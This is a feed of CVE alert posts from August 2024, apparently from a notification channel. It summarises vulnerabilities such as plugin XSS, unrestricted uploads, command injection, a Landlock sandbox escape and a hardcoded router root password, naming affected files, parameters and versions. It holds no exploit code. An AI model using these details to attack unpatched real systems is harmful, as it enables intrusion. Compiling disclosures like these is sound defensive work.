🚨 CVE-2024-43308Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Gutentor Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor allows Stored XSS.This issue affects Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor: from n/a through 3.3.5.🎖@cveNotify |
|
| 2024-08-18 15:37:25 |
🚨 CVE-2024-43306Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP-Lister Lite for eBay allows Reflected XSS.This issue affects WP-Lister Lite for eBay: from n/a through 3.6.0.🎖@cveNotify |
|
| 2024-08-18 15:37:24 |
🚨 CVE-2024-43305Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Code Amp Custom Layouts – Post + Product grids made easy allows Stored XSS.This issue affects Custom Layouts – Post + Product grids made easy: from n/a through 1.4.11.🎖@cveNotify |
|
| 2024-08-18 14:37:41 |
🚨 CVE-2024-7906A vulnerability classified as critical was found in DedeBIZ 6.3.0. This vulnerability affects the function get_mime_type of the file /admin/dialog/select_images_post.php of the component Attachment Settings. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-18 14:37:40 |
🚨 CVE-2024-43352Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Organic Themes GivingPress Lite allows Stored XSS.This issue affects GivingPress Lite: from n/a through 1.8.6.🎖@cveNotify |
|
| 2024-08-18 14:37:37 |
🚨 CVE-2024-43351Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CryoutCreations Bravada bravada allows Stored XSS.This issue affects Bravada: from n/a through 1.1.2.🎖@cveNotify |
|
| 2024-08-18 14:37:36 |
🚨 CVE-2024-43348Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Iznyn Purity Of Soul allows Reflected XSS.This issue affects Purity Of Soul: from n/a through 1.9.🎖@cveNotify |
|
| 2024-08-18 14:37:35 |
🚨 CVE-2024-43346Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wow-Company Modal Window allows Stored XSS.This issue affects Modal Window: from n/a through 6.0.3.🎖@cveNotify |
|
| 2024-08-18 14:37:31 |
🚨 CVE-2024-43335Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CyberChimps Responsive Blocks – WordPress Gutenberg Blocks allows Stored XSS.This issue affects Responsive Blocks – WordPress Gutenberg Blocks: from n/a through 1.8.8.🎖@cveNotify |
|
| 2024-08-18 14:37:30 |
🚨 CVE-2024-43329Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Chill Allegiant allegiant allows Stored XSS.This issue affects Allegiant: from n/a through 1.2.7.🎖@cveNotify |
|
| 2024-08-18 14:37:26 |
🚨 CVE-2024-43324Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CleverSoft Clever Addons for Elementor allows Stored XSS.This issue affects Clever Addons for Elementor: from n/a through 2.2.0.🎖@cveNotify |
|
| 2024-08-18 14:37:25 |
🚨 CVE-2024-43238Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in weDevs weMail allows Reflected XSS.This issue affects weMail: from n/a through 1.14.5.🎖@cveNotify |
|
| 2024-08-18 14:37:24 |
🚨 CVE-2024-39666Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Automattic WooCommerce.This issue affects WooCommerce: from n/a through 9.1.2.🎖@cveNotify |
|
| 2024-08-18 13:37:24 |
🚨 CVE-2024-43353Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in myCred allows Stored XSS.This issue affects myCred: from n/a through 2.7.2.🎖@cveNotify |
|
| 2024-08-18 12:37:24 |
🚨 CVE-2024-7905A vulnerability classified as critical has been found in DedeBIZ 6.3.0. This affects the function AdminUpload of the file admin/archives_do.php. The manipulation of the argument litpic leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-18 09:37:25 |
🚨 CVE-2024-7904A vulnerability was found in DedeBIZ 6.3.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file admin/file_manage_control.php of the component File Extension Handler. The manipulation of the argument upfile1 leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-18 09:37:24 |
🚨 CVE-2024-42318In the Linux kernel, the following vulnerability has been resolved:landlock: Don't lose track of restrictions on cred_transferWhen a process' cred struct is replaced, this _almost_ always invokesthe cred_prepare LSM hook; but in one special case (whenKEYCTL_SESSION_TO_PARENT updates the parent's credentials), thecred_transfer LSM hook is used instead. Landlock only implements thecred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causesall information on Landlock restrictions to be lost.This basically means that a process with the ability to use the fork()and keyctl() syscalls can get rid of all Landlock restrictions onitself.Fix it by adding a cred_transfer hook that does the same thing as theexisting cred_prepare hook. (Implemented by having hook_cred_prepare()call hook_cred_transfer() so that the two functions are less likely toaccidentally diverge in the future.)🎖@cveNotify |
|
| 2024-08-18 07:37:24 |
🚨 CVE-2024-7903A vulnerability was found in DedeBIZ 6.3.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file admin/media_add.php of the component File Extension Handler. The manipulation of the argument upfile1 leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-17 22:37:24 |
🚨 CVE-2024-7902A vulnerability was found in pkp ojs up to 3.4.0-6 and classified as problematic. Affected by this issue is some unknown functionality of the file /login/signOut. The manipulation of the argument source with the input .example.com leads to open redirect. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-17 21:37:24 |
🚨 CVE-2024-7901A vulnerability has been found in Scada-LTS 2.7.8 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Scada-LTS/app.shtm#/alarms/Scada of the component Message Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-17 20:37:24 |
🚨 CVE-2024-7900A vulnerability, which was classified as problematic, was found in xiaohe4966 TpMeCMS 1.3.3.2. Affected is an unknown function of the file /h.php/general/config?ref=addtabs of the component Basic Configuration Handler. The manipulation of the argument Site Name/Beian/Contact address/copyright/technical support leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-17 19:37:24 |
🚨 CVE-2024-7899A vulnerability, which was classified as critical, has been found in InnoCMS 0.3.1. This issue affects some unknown processing of the file /panel/pages/1/edit of the component Backend. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-17 18:37:24 |
🚨 CVE-2024-7898A vulnerability classified as critical was found in Tosei Online Store Management System ネット店舗管理システム 4.02/4.03/4.04. This vulnerability affects unknown code of the component Backend. The manipulation leads to use of default credentials. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-17 17:37:24 |
🚨 CVE-2024-42318In the Linux kernel, the following vulnerability has been resolved:landlock: Don't lose track of restrictions on cred_transferWhen a process' cred struct is replaced, this _almost_ always invokesthe cred_prepare LSM hook; but in one special case (whenKEYCTL_SESSION_TO_PARENT updates the parent's credentials), thecred_transfer LSM hook is used instead. Landlock only implements thecred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causesall information on Landlock restrictions to be lost.This basically means that a process with the ability to use the fork()and keyctl() syscalls can get rid of all Landlock restrictions onitself.Fix it by adding a cred_transfer hook that does the same thing as theexisting cred_prepare hook. (Implemented by having hook_cred_prepare()call hook_cred_transfer() so that the two functions are less likely toaccidentally diverge in the future.)🎖@cveNotify |
|
| 2024-08-17 15:37:24 |
🚨 CVE-2024-7897A vulnerability classified as critical has been found in Tosei Online Store Management System ネット店舗管理システム 4.02/4.03/4.04. This affects an unknown part of the file /cgi-bin/tosei_kikai.php. The manipulation of the argument kikaibangou leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-17 14:37:24 |
🚨 CVE-2024-7896A vulnerability was found in Tosei Online Store Management System ネット店舗管理システム 4.02/4.03/4.04. It has been rated as critical. Affected by this issue is some unknown functionality of the file /cgi-bin/p1_ftpserver.php. The manipulation of the argument adr_txt leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-17 12:37:24 |
🚨 CVE-2024-7703The ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.0.37 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-08-17 10:37:33 |
🚨 CVE-2024-43816In the Linux kernel, the following vulnerability has been resolved:scsi: lpfc: Revise lpfc_prep_embed_io routine with proper endian macro usagesOn big endian architectures, it is possible to run into a memory out ofbounds pointer dereference when FCP targets are zoned.In lpfc_prep_embed_io, the memcpy(ptr, fcp_cmnd, sgl->sge_len) isreferencing a little endian formatted sgl->sge_len value. So, the memcpycan cause big endian systems to crash.Redefine the *sgl ptr as a struct sli4_sge_le to make it clear that we arereferring to a little endian formatted data structure. And, update theroutine with proper le32_to_cpu macro usages.🎖@cveNotify |
|
| 2024-08-17 10:37:26 |
🚨 CVE-2023-3419The tagDiv Opt-In Builder plugin is vulnerable to Blind SQL Injection via the 'couponId' parameter of the 'recreate_stripe_subscription' REST API endpoint in versions up to, and including, 1.4.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with administrator-level privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-17 10:37:25 |
🚨 CVE-2023-0714The Metform Elementor Contact Form Builder for WordPress is vulnerable to Arbitrary File Upload due to insufficient file type validation in versions up to, and including, 3.2.4. This allows unauthenticated visitors to perform a "double extension" attack and upload files containing a malicious extension but ending with a benign extension, which may make remote code execution possible in some configurations.🎖@cveNotify |
|
| 2024-08-17 10:37:24 |
🚨 CVE-2024-7709A vulnerability, which was classified as problematic, has been found in OcoMon 4.0RC1/4.0/5.0RC1. This issue affects some unknown processing of the file /includes/common/require_access_recovery.php of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0.1 and 5.0 is able to address this issue. It is recommended to upgrade the affected component.🎖@cveNotify |
|
| 2024-08-17 09:37:25 |
🚨 CVE-2023-3408The Bricks theme for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.1. This is due to missing or incorrect nonce validation on the 'save_settings' function. This makes it possible for unauthenticated attackers to modify the theme's settings, including enabling a setting which allows lower-privileged users such as contributors to perform code execution, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-08-17 08:37:33 |
🚨 CVE-2023-4025The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_player function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to update player instances.🎖@cveNotify |
|
| 2024-08-17 08:37:26 |
🚨 CVE-2023-4024The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_player function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to delete player instances.🎖@cveNotify |
|
| 2024-08-17 08:37:25 |
🚨 CVE-2022-1751The Skitter Slideshow plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.5.2 via the /image.php file. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2024-08-17 08:37:24 |
🚨 CVE-2024-7886A vulnerability has been found in Scooter Software Beyond Compare up to 3.3.5.15075 and classified as critical. Affected by this vulnerability is an unknown functionality in the library 7zxa.dll. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The real existence of this vulnerability is still doubted at the moment. NOTE: The vendor explains that a system must be breached before exploiting this issue.🎖@cveNotify |
|
| 2024-08-17 06:37:24 |
🚨 CVE-2024-6459The News Element Elementor Blog Magazine WordPress plugin before 1.0.6 is vulnerable to Local File Inclusion via the template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.🎖@cveNotify |
|
| 2024-08-17 03:37:24 |
🚨 CVE-2024-6500The InPost for WooCommerce plugin and InPost PL plugin for WordPress are vulnerable to unauthorized access and deletion of data due to a missing capability check on the 'parse_request' function in all versions up to, and including, 1.4.0 (for InPost for WooCommerce) as well as 1.4.4 (for InPost PL). This makes it possible for unauthenticated attackers to read and delete arbitrary files on Windows servers. On Linux servers, only files within the WordPress install will be deleted, but all files can be read.🎖@cveNotify |
|
| 2024-08-16 22:37:24 |
🚨 CVE-2024-7886** DISPUTED ** A vulnerability has been found in Scooter Software Beyond Compare up to 3.3.5.15075 and classified as critical. Affected by this vulnerability is an unknown functionality in the library 7zxa.dll. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The real existence of this vulnerability is still doubted at the moment. NOTE: The vendor explains that a system must be breached before exploiting this issue.🎖@cveNotify |
|
| 2024-08-16 22:07:24 |
🚨 CVE-2024-43373webcrack is a tool for reverse engineering javascript. An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system. This vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. This vulnerability has been patched in version 2.14.1.🎖@cveNotify |
|
| 2024-08-16 21:37:32 |
🚨 CVE-2024-43395CraftOS-PC 2 is a rewrite of the desktop port of CraftOS from the popular Minecraft mod ComputerCraft using C++ and a modified version of PUC Lua, as well as SDL for drawing. Prior to version 2.8.3, users of CraftOS-PC 2 on Windows can escape the computer folder and access files anywhere without permission or notice by obfuscating `..`s to bypass the internal check preventing parent directory traversal. Version 2.8.3 contains a patch for this issue.🎖@cveNotify |
|
| 2024-08-16 21:37:26 |
🚨 CVE-2024-42637H3C R3010 v100R002L02 was discovered to contain a hardcoded password vulnerability in /etc/shadow, which allows attackers to log in as root.🎖@cveNotify |
|
| 2024-08-16 21:37:25 |
🚨 CVE-2024-40051IP Guard v4.81.0307.0 was discovered to contain an arbitrary file read vulnerability via the file name parameter.🎖@cveNotify |
|
| 2024-08-16 21:37:24 |
🚨 CVE-2007-2728The soap extension in PHP calls php_rand_r with an uninitialized seed variable, which has unknown impact and attack vectors, a related issue to the mcrypt_create_iv issue covered by CVE-2007-2727. Note: The PHP team argue that this is not a valid security issue.🎖@cveNotify |
|
| 2024-08-16 21:07:38 |
🚨 CVE-2024-38114Windows IP Routing Management Snapin Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-16 21:07:31 |
🚨 CVE-2024-38108Azure Stack Hub Spoofing Vulnerability🎖@cveNotify |
|
| 2024-08-16 21:07:30 |
🚨 CVE-2024-38063Windows TCP/IP Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-16 21:07:26 |
🚨 CVE-2024-29995Windows Kerberos Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-16 21:07:25 |
🚨 CVE-2024-5741Stored XSS in inventory tree rendering in Checkmk before 2.3.0p7, 2.2.0p28, 2.1.0p45 and 2.0.0 (EOL)🎖@cveNotify |
|
| 2024-08-16 21:07:24 |
🚨 CVE-2024-6043A vulnerability classified as critical has been found in SourceCodester Best House Rental Management System 1.0. This affects the function login of the file admin_class.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268767.🎖@cveNotify |
|
| 2024-08-16 20:07:25 |
🚨 CVE-2024-37314Nextcloud Photos is a photo management app. Users can remove photos from the album of registered users. It is recommended that the Nextcloud Server is upgraded to 25.0.7 or 26.0.2 and the Nextcloud Enterprise Server is upgraded to 25.0.7 or 26.0.2.🎖@cveNotify |
|
| 2024-08-16 20:07:24 |
🚨 CVE-2024-5469DoS in KAS in GitLab CE/EE affecting all versions from 16.10.0 prior to 16.10.6 and 16.11.0 prior to 16.11.3 allows an attacker to crash KAS via crafted gRPC requests.🎖@cveNotify |
|
| 2024-08-16 19:07:32 |
🚨 CVE-2024-38187Windows Kernel-Mode Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-16 19:07:26 |
🚨 CVE-2024-38186Windows Kernel-Mode Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-16 19:07:25 |
🚨 CVE-2024-38167.NET and Visual Studio Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-08-16 19:07:24 |
🚨 CVE-2024-38165Windows Compressed Folder Tampering Vulnerability🎖@cveNotify |
|
| 2024-08-16 18:07:29 |
🚨 CVE-2024-27881A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.6, macOS Monterey 12.7.6, macOS Ventura 13.6.8. An app may be able to access information about a user’s contacts.🎖@cveNotify |
|
| 2024-08-16 18:07:26 |
🚨 CVE-2024-25090Insufficient input validation and sanitation in Profile name & screenname, Bookmark name & description and blogroll name features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: if you do not have Roller configured for untrusted users, then you need to do nothing because you trust your users to author raw HTML and other web content. If you are running with untrusted users then you should upgrade to Roller 6.1.3.This issue affects Apache Roller: from 5.0.0 before 6.1.3.Users are recommended to upgrade to version 6.1.3, which fixes the issue.🎖@cveNotify |
|
| 2024-08-16 18:07:25 |
🚨 CVE-2024-32918Permission Bypass allowing attackers to disable HDCP 2.2 encryption by not completing the HDCP Key Exchange initialization steps🎖@cveNotify |
|
| 2024-08-16 18:07:24 |
🚨 CVE-2024-34686Due to insufficient input validation, SAP CRMWebClient UI allows an unauthenticated attacker to craft a URL link whichembeds a malicious script. When a victim clicks on this link, the script willbe executed in the victim's browser giving the attacker the ability to accessand/or modify information with no effect on availability of the application.🎖@cveNotify |
|
| 2024-08-16 17:37:44 |
🚨 CVE-2024-42955Tenda FH1201 v1.2.0.14 (408) was discovered to contain a stack overflow via the page parameter in the fromSafeClientFilter function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-16 17:37:37 |
🚨 CVE-2024-38122Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-08-16 17:37:36 |
🚨 CVE-2024-38120Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-16 17:37:35 |
🚨 CVE-2024-6134The wp-cart-for-digital-products WordPress plugin before 8.5.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-08-16 17:37:32 |
🚨 CVE-2024-43045Jenkins 2.470 and earlier, LTS 2.452.3 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to access other users' "My Views".🎖@cveNotify |
|
| 2024-08-16 17:37:31 |
🚨 CVE-2023-43292Cross Site Scripting vulnerability in My Food Recipe Using PHP with Source Code v.1.0 allows a local attacker to execute arbitrary code via a crafted payload to the Recipe Name, Procedure, and ingredients parameters.🎖@cveNotify |
|
| 2024-08-16 17:37:30 |
🚨 CVE-2023-33676Sourcecodester Lost and Found Information System's Version 1.0 is vulnerable to unauthenticated SQL Injection at "?page=items/view&id=*" which can be escalated to the remote command execution.🎖@cveNotify |
|
| 2024-08-16 17:37:26 |
🚨 CVE-2024-25386Directory Traversal vulnerability in DICOM® Connectivity Framework by laurelbridge before v.2.7.6b allows a remote attacker to execute arbitrary code via the format_logfile.pl file.🎖@cveNotify |
|
| 2024-08-16 17:37:25 |
🚨 CVE-2024-22543An issue was discovered in Linksys Router E1700 1.0.04 (build 3), allows authenticated attackers to escalate privileges via a crafted GET request to the /goform/* URI or via the ExportSettings function.🎖@cveNotify |
|
| 2024-08-16 17:07:32 |
🚨 CVE-2024-42461In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because BER-encoded signatures are allowed.🎖@cveNotify |
|
| 2024-08-16 17:07:31 |
🚨 CVE-2024-28964Dell Common Event Enabler, version 8.9.10.0 and prior, contain an insecure deserialization vulnerability in CAVATools. A local unauthenticated attacker could potentially exploit this vulnerability, leading to arbitrary code execution in the context of the logged in user. Exploitation of this issue requires a victim to open a malicious file.🎖@cveNotify |
|
| 2024-08-16 16:37:49 |
🚨 CVE-2024-42480Kamaji is the Hosted Control Plane Manager for Kubernetes. In versions 1.0.0 and earlier, Kamaji uses an "open at the top" range definition in RBAC for etcd roles leading to some TCPs API servers being able to read, write, and delete the data of other control planes. This vulnerability is fixed in edge-24.8.2.🎖@cveNotify |
|
| 2024-08-16 16:37:48 |
🚨 CVE-2024-36821Insecure permissions in Linksys Velop WiFi 5 (WHW01v1) 1.1.13.202617 allows attackers to escalate privileges from Guest to root.🎖@cveNotify |
|
| 2024-08-16 16:37:47 |
🚨 CVE-2024-37293The AWS Deployment Framework (ADF) is a framework to manage and deploy resources across multiple AWS accounts and regions within an AWS Organization. ADF allows for staged, parallel, multi-account, cross-region deployments of applications or resources via the structure defined in AWS Organizations while taking advantage of services such as AWS CodePipeline, AWS CodeBuild, and AWS CodeCommit to alleviate the heavy lifting and management compared to a traditional CI/CD setup. ADF contains a bootstrap process that is responsible to deploy ADF's bootstrap stacks to facilitate multi-account cross-region deployments. The ADF bootstrap process relies on elevated privileges to perform this task. Two versions of the bootstrap process exist; a code-change driven pipeline using AWS CodeBuild and an event-driven state machine using AWS Lambda. If an actor has permissions to change the behavior of the CodeBuild project or the Lambda function, they would be able to escalate their privileges.Prior to version 4.0.0, the bootstrap CodeBuild role provides access to the `sts:AssumeRole` operation without further restrictions. Therefore, it is able to assume into any AWS Account in the AWS Organization with the elevated privileges provided by the cross-account access role. By default, this role is not restricted when it is created by AWS Organizations, providing Administrator level access to the AWS resources in the AWS Account. The patches for this issue are included in `aws-deployment-framework` version 4.0.0.As a temporary mitigation, add a permissions boundary to the roles created by ADF in the management account. The permissions boundary should deny all IAM and STS actions. This permissions boundary should be in place until you upgrade ADF or bootstrap a new account. While the permissions boundary is in place, the account management and bootstrapping of accounts are unable to create, update, or assume into roles. This mitigates the privilege escalation risk, but also disables ADF's ability to create, manage, and bootstrap accounts.🎖@cveNotify |
|
| 2024-08-16 16:37:43 |
🚨 CVE-2024-33212Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the funcpara1 parameter in ip/goform/setcfm.🎖@cveNotify |
|
| 2024-08-16 16:37:42 |
🚨 CVE-2023-51141An issue in ZKTeko BioTime v.8.5.4 and before allows a remote attacker to obtain sensitive information via the Authentication & Authorization component🎖@cveNotify |
|
| 2024-08-16 16:37:38 |
🚨 CVE-2024-28418Webedition CMS 9.2.2.0 has a File upload vulnerability via /webEdition/we_cmd.php🎖@cveNotify |
|
| 2024-08-16 16:37:37 |
🚨 CVE-2024-27744Cross Site Scripting vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.🎖@cveNotify |
|
| 2024-08-16 16:37:33 |
🚨 CVE-2023-40109In createFromParcel of UsbConfiguration.java, there is a possible background activity launch (BAL) due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-08-16 16:07:41 |
🚨 CVE-2024-38127Windows Hyper-V Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-16 16:07:40 |
🚨 CVE-2024-38126Windows Network Address Translation (NAT) Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-08-16 16:07:39 |
🚨 CVE-2024-38123Windows Bluetooth Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-08-16 16:07:38 |
🚨 CVE-2024-41264An issue discovered in casdoor v1.636.0 allows attackers to obtain sensitive information via the ssh.InsecureIgnoreHostKey() method.🎖@cveNotify |
|
| 2024-08-16 15:37:51 |
🚨 CVE-2024-34737In ensureSetPipAspectRatioQuotaTracker of ActivityClientController.java, there is a possible way to generate unmovable and undeletable pip windows due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-16 15:37:50 |
🚨 CVE-2024-34731In multiple functions of TranscodingResourcePolicy.cpp, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-16 15:37:49 |
🚨 CVE-2024-31333In _MMU_AllocLevel of mmu_common.c, there is a possible arbitrary code execution due to an integer overflow. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-16 15:37:46 |
🚨 CVE-2024-38189Microsoft Project Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-16 15:37:45 |
🚨 CVE-2024-38136Windows Resource Manager PSM Service Extension Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-16 15:37:44 |
🚨 CVE-2024-38132Windows Network Address Translation (NAT) Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-08-16 15:37:40 |
🚨 CVE-2024-38130Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-16 15:37:39 |
🚨 CVE-2024-7255Out of bounds read in WebTransport in Google Chrome prior to 127.0.6533.88 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-16 15:37:38 |
🚨 CVE-2024-6990Uninitialized Use in Dawn in Google Chrome on Android prior to 127.0.6533.88 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2024-08-16 14:37:42 |
🚨 CVE-2024-7145The JetElements plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.6.20 via the 'progress_type' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-08-16 14:37:41 |
🚨 CVE-2024-7144The JetElements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' and 'slide_id' parameters in all versions up to, and including, 2.6.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-16 14:37:38 |
🚨 CVE-2024-42466Improper Restriction of Excessive Authentication Attempts vulnerability in upKeeper Solutions product upKeeper Manager allows Authentication Abuse.This issue affects upKeeper Manager: through 5.1.9.🎖@cveNotify |
|
| 2024-08-16 14:37:37 |
🚨 CVE-2024-42464Authorization Bypass Through User-Controlled Key vulnerability in upKeeper Solutions product upKeeper Manager allows Utilizing REST's Trust in the System Resource to Obtain Sensitive Data.This issue affects upKeeper Manager: through 5.1.9.🎖@cveNotify |
|
| 2024-08-16 14:37:36 |
🚨 CVE-2024-42462Improper Authentication vulnerability in upKeeper Solutions product upKeeper Manager allows Authentication Bypass.This issue affects upKeeper Manager: through 5.1.9.🎖@cveNotify |
|
| 2024-08-16 14:37:32 |
🚨 CVE-2024-34740In attributeBytesBase64 and attributeBytesHex of BinaryXmlSerializer.java, there is a possible arbitrary XML injection due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-16 14:37:31 |
🚨 CVE-2024-7262Improper path validation in promecefpluginhost.exe in Kingsoft WPS Office version ranging from 12.2.0.13110 to 12.2.0.13489 (inclusive) on Windows allows an attacker to load an arbitrary Windows library.The vulnerability was found weaponized as a single-click exploit in the form of a deceptive spreadsheet document🎖@cveNotify |
|
| 2024-08-16 14:37:30 |
🚨 CVE-2024-6347* Unprotected privileged mode access through UDS session in the Blind Spot Detection Sensor ECU firmware in Nissan Altima (2022) allows attackers to trigger denial-of-service (DoS) by unauthorized access to the ECU's programming session. * No preconditions implemented for ECU management functionality through UDS session in the Blind Spot Detection Sensor ECU in Nissan Altima (2022) allows attackers to disrupt normal ECU operations by triggering a control command without authentication.🎖@cveNotify |
|
| 2024-08-16 14:37:26 |
